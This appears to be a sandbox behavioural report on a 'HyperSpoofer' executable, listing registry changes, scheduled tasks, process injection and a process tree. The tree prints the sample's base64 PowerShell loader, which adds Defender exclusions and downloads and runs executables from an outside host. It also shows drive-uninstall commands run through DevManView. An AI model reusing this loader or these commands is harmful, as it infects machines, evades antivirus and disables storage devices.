Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ConfigFlags	DevManView.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 47 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	sphyperRuntimedhcpSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	sphyperRuntimedhcpSvc.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2332	schtasks.exe
1100	schtasks.exe
800	schtasks.exe
3692	schtasks.exe
4412	schtasks.exe
4848	schtasks.exe
760	schtasks.exe
3804	schtasks.exe
4788	schtasks.exe
3460	schtasks.exe
1576	schtasks.exe
1816	schtasks.exe
2780	schtasks.exe
2284	schtasks.exe
544	schtasks.exe
1264	schtasks.exe
2428	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4520	powershell.exe
4520	powershell.exe
3424	DevManView.exe
3424	DevManView.exe
3408	DevManView.exe
3408	DevManView.exe
4964	DevManView.exe
4964	DevManView.exe
5080	DevManView.exe
2636	DevManView.exe
5080	DevManView.exe
2636	DevManView.exe
1088	DevManView.exe
1088	DevManView.exe
4356	DevManView.exe
4356	DevManView.exe
408	DevManView.exe
408	DevManView.exe
2900	DevManView.exe
2900	DevManView.exe
3000	DevManView.exe
3000	DevManView.exe
2580	DevManView.exe
2580	DevManView.exe
2924	DevManView.exe
2924	DevManView.exe
3764	DevManView.exe
3764	DevManView.exe
4840	DevManView.exe
4840	DevManView.exe
2392	DevManView.exe
2392	DevManView.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe
2440	sphyperRuntimedhcpSvc.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1940	HpsrSpoof.exe
2084	taskhostw.exe

Suspicious behavior: LoadsDriver 25 IoCs

pid	Process
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4520	powershell.exe
Token: SeBackupPrivilege	3408	DevManView.exe
Token: SeRestorePrivilege	3408	DevManView.exe
Token: SeTakeOwnershipPrivilege	3408	DevManView.exe
Token: SeBackupPrivilege	3424	DevManView.exe
Token: SeRestorePrivilege	3424	DevManView.exe
Token: SeTakeOwnershipPrivilege	3424	DevManView.exe
Token: SeBackupPrivilege	2636	DevManView.exe
Token: SeRestorePrivilege	2636	DevManView.exe
Token: SeTakeOwnershipPrivilege	2636	DevManView.exe
Token: SeBackupPrivilege	5080	DevManView.exe
Token: SeRestorePrivilege	5080	DevManView.exe
Token: SeTakeOwnershipPrivilege	5080	DevManView.exe
Token: SeBackupPrivilege	4964	DevManView.exe
Token: SeRestorePrivilege	4964	DevManView.exe
Token: SeTakeOwnershipPrivilege	4964	DevManView.exe
Token: SeImpersonatePrivilege	3408	DevManView.exe
Token: SeImpersonatePrivilege	4964	DevManView.exe
Token: SeImpersonatePrivilege	2636	DevManView.exe
Token: SeImpersonatePrivilege	3424	DevManView.exe
Token: SeBackupPrivilege	1088	DevManView.exe
Token: SeRestorePrivilege	1088	DevManView.exe
Token: SeTakeOwnershipPrivilege	1088	DevManView.exe
Token: SeImpersonatePrivilege	5080	DevManView.exe
Token: SeBackupPrivilege	4356	DevManView.exe
Token: SeRestorePrivilege	4356	DevManView.exe
Token: SeTakeOwnershipPrivilege	4356	DevManView.exe
Token: SeImpersonatePrivilege	1088	DevManView.exe
Token: SeImpersonatePrivilege	4356	DevManView.exe
Token: SeBackupPrivilege	408	DevManView.exe
Token: SeRestorePrivilege	408	DevManView.exe
Token: SeTakeOwnershipPrivilege	408	DevManView.exe
Token: SeBackupPrivilege	2900	DevManView.exe
Token: SeRestorePrivilege	2900	DevManView.exe
Token: SeTakeOwnershipPrivilege	2900	DevManView.exe
Token: SeImpersonatePrivilege	408	DevManView.exe
Token: SeImpersonatePrivilege	2900	DevManView.exe
Token: SeBackupPrivilege	3000	DevManView.exe
Token: SeRestorePrivilege	3000	DevManView.exe
Token: SeTakeOwnershipPrivilege	3000	DevManView.exe
Token: SeImpersonatePrivilege	3000	DevManView.exe
Token: SeBackupPrivilege	2580	DevManView.exe
Token: SeRestorePrivilege	2580	DevManView.exe
Token: SeTakeOwnershipPrivilege	2580	DevManView.exe
Token: SeImpersonatePrivilege	2580	DevManView.exe
Token: SeBackupPrivilege	2924	DevManView.exe
Token: SeRestorePrivilege	2924	DevManView.exe
Token: SeTakeOwnershipPrivilege	2924	DevManView.exe
Token: SeImpersonatePrivilege	2924	DevManView.exe
Token: SeBackupPrivilege	3764	DevManView.exe
Token: SeRestorePrivilege	3764	DevManView.exe
Token: SeTakeOwnershipPrivilege	3764	DevManView.exe
Token: SeBackupPrivilege	4840	DevManView.exe
Token: SeRestorePrivilege	4840	DevManView.exe
Token: SeTakeOwnershipPrivilege	4840	DevManView.exe
Token: SeImpersonatePrivilege	4840	DevManView.exe
Token: SeBackupPrivilege	2392	DevManView.exe
Token: SeRestorePrivilege	2392	DevManView.exe
Token: SeTakeOwnershipPrivilege	2392	DevManView.exe
Token: SeImpersonatePrivilege	3764	DevManView.exe
Token: SeImpersonatePrivilege	2392	DevManView.exe
Token: SeLoadDriverPrivilege	4840	DevManView.exe
Token: SeLoadDriverPrivilege	3764	DevManView.exe
Token: SeLoadDriverPrivilege	4840	DevManView.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe
5156	chrome.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
400	HyperSpoofer.exe
2404	VC_redistx64.exe
1176	service.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 400 wrote to memory of 4520	400	HyperSpoofer.exe	83
PID 400 wrote to memory of 4520	400	HyperSpoofer.exe	83
PID 400 wrote to memory of 4520	400	HyperSpoofer.exe	83
PID 4520 wrote to memory of 1940	4520	powershell.exe	87
PID 4520 wrote to memory of 1940	4520	powershell.exe	87
PID 4520 wrote to memory of 4248	4520	powershell.exe	89
PID 4520 wrote to memory of 4248	4520	powershell.exe	89
PID 4520 wrote to memory of 4248	4520	powershell.exe	89
PID 4520 wrote to memory of 3104	4520	powershell.exe	90
PID 4520 wrote to memory of 3104	4520	powershell.exe	90
PID 4520 wrote to memory of 2404	4520	powershell.exe	91
PID 4520 wrote to memory of 2404	4520	powershell.exe	91
PID 4520 wrote to memory of 2404	4520	powershell.exe	91
PID 1940 wrote to memory of 3092	1940	HpsrSpoof.exe	92
PID 1940 wrote to memory of 3092	1940	HpsrSpoof.exe	92
PID 4248 wrote to memory of 2240	4248	sphyperRuntimedhcpSvc.exe	94
PID 4248 wrote to memory of 2240	4248	sphyperRuntimedhcpSvc.exe	94
PID 4248 wrote to memory of 2240	4248	sphyperRuntimedhcpSvc.exe	94
PID 3092 wrote to memory of 552	3092	cmd.exe	95
PID 3092 wrote to memory of 552	3092	cmd.exe	95
PID 2404 wrote to memory of 3660	2404	VC_redistx64.exe	96
PID 2404 wrote to memory of 3660	2404	VC_redistx64.exe	96
PID 2404 wrote to memory of 3660	2404	VC_redistx64.exe	96
PID 3660 wrote to memory of 2332	3660	cmd.exe	98
PID 3660 wrote to memory of 2332	3660	cmd.exe	98
PID 3660 wrote to memory of 2332	3660	cmd.exe	98
PID 1940 wrote to memory of 1624	1940	HpsrSpoof.exe	99
PID 1940 wrote to memory of 1624	1940	HpsrSpoof.exe	99
PID 1624 wrote to memory of 3424	1624	cmd.exe	101
PID 1624 wrote to memory of 3424	1624	cmd.exe	101
PID 1624 wrote to memory of 3408	1624	cmd.exe	102
PID 1624 wrote to memory of 3408	1624	cmd.exe	102
PID 1624 wrote to memory of 2636	1624	cmd.exe	103
PID 1624 wrote to memory of 2636	1624	cmd.exe	103
PID 1624 wrote to memory of 4964	1624	cmd.exe	104
PID 1624 wrote to memory of 4964	1624	cmd.exe	104
PID 1624 wrote to memory of 5080	1624	cmd.exe	105
PID 1624 wrote to memory of 5080	1624	cmd.exe	105
PID 1624 wrote to memory of 1088	1624	cmd.exe	106
PID 1624 wrote to memory of 1088	1624	cmd.exe	106
PID 1624 wrote to memory of 4356	1624	cmd.exe	107
PID 1624 wrote to memory of 4356	1624	cmd.exe	107
PID 1624 wrote to memory of 408	1624	cmd.exe	210
PID 1624 wrote to memory of 408	1624	cmd.exe	210
PID 1624 wrote to memory of 2900	1624	cmd.exe	109
PID 1624 wrote to memory of 2900	1624	cmd.exe	109
PID 1624 wrote to memory of 3000	1624	cmd.exe	110
PID 1624 wrote to memory of 3000	1624	cmd.exe	110
PID 1624 wrote to memory of 2580	1624	cmd.exe	111
PID 1624 wrote to memory of 2580	1624	cmd.exe	111
PID 1624 wrote to memory of 2924	1624	cmd.exe	274
PID 1624 wrote to memory of 2924	1624	cmd.exe	274
PID 1624 wrote to memory of 4840	1624	cmd.exe	113
PID 1624 wrote to memory of 4840	1624	cmd.exe	113
PID 1624 wrote to memory of 3764	1624	cmd.exe	302
PID 1624 wrote to memory of 3764	1624	cmd.exe	302
PID 1624 wrote to memory of 2392	1624	cmd.exe	273
PID 1624 wrote to memory of 2392	1624	cmd.exe	273
PID 2240 wrote to memory of 2904	2240	WScript.exe	116
PID 2240 wrote to memory of 2904	2240	WScript.exe	116
PID 2240 wrote to memory of 2904	2240	WScript.exe	116
PID 2904 wrote to memory of 2440	2904	cmd.exe	225
PID 2904 wrote to memory of 2440	2904	cmd.exe	225
PID 1940 wrote to memory of 3188	1940	HpsrSpoof.exe	271

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\HyperSpoofer.exe
"C:\Users\Admin\AppData\Local\Temp\HyperSpoofer.exe"
1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:400
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcwB6AGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbABuAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBzAGQAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBIAHAAcwByAFMAcABvAG8AZgAuAGUAeABlACcALAAgADwAIwBpAHQAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAeAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApACkAPAAjAGUAcABmACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAGMAdgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB2AG0AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABtAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAYgBkAHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwAsACAAPAAjAHoAZwBmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABnAHYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBuAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQApADwAIwBkAGYAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AYwAvAFYAQwBfAHIAZQBkAGkAcwB0AHgANgA0AC4AZQB4AGUAJwAsACAAPAAjAGEAYwBsACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbgBpAHAAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbgBoAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACkAKQA8ACMAeABuAG4AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYgBjAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAcgBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApADwAIwBzAGYAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAG4AaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYQBoAGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAPAAjAGUAcgBoACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAZgB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBsAGYAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwApADwAIwBtAG4AZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB6AGQAbgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeQBlAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACkAPAAjAHIAcAB6ACMAPgA="
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4520
- - C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
    "C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of WriteProcessMemory
    PID:1940
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: T2ZN-G119
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3092
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: T2ZN-G119
        5⤵
        Executes dropped EXE
        
        PID:552
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1624
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3424
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3408
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2636
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4964
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5080
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1088
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4356
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
